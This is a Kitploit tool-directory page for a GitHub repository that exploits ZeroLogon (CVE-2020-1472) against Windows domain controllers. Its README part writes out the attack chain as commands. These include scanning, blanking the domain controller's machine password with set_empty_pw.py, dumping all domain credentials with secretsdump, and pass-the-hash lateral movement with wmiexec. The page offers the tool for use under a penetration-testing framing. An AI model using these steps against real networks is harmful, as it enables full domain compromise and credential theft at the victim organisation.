Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2020-1472 — Exploit script for CVE-2020-1472 (ZeroLogon) with automated privilege escalation, credential dumping via secretsdump, and lateral movement using wmiexec for Active Directory domain compromise. | Kitploit
Tools/GitHubGitHub/dr4g0n23/cve-2020-1472
Privilege EscalationVulnerability AnalysisExploitationLateral MovementPost-ExploitationPenetration Testing
GitHubdr4g0n23/cve-2020-1472

CVE-2020-1472

Exploit script for CVE-2020-1472 (ZeroLogon) with automated privilege escalation, credential dumping via secretsdump, and lateral movement using wmiexec for Active Directory domain compromise.

View Repository
43 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2020-1472

arp-scan Rang_ip

nmap -A -vv -Pn IP_ADDR

python3 set_empty_pw.py DC_NETBIOS_NAME DC_IP_ADDR

python3 secretsdump.py -no-pass -just-dc DOMAIN/DC_NETBIOS_NAME$@DC_IP_ADDR

python3 wmiexec.py -hashes Hass_Passwd_User DOMAIN/User@dc_ip_addr

#windows command

whoami

systeminfo

hostname

md test_dir

echo test > test_file

Download Tool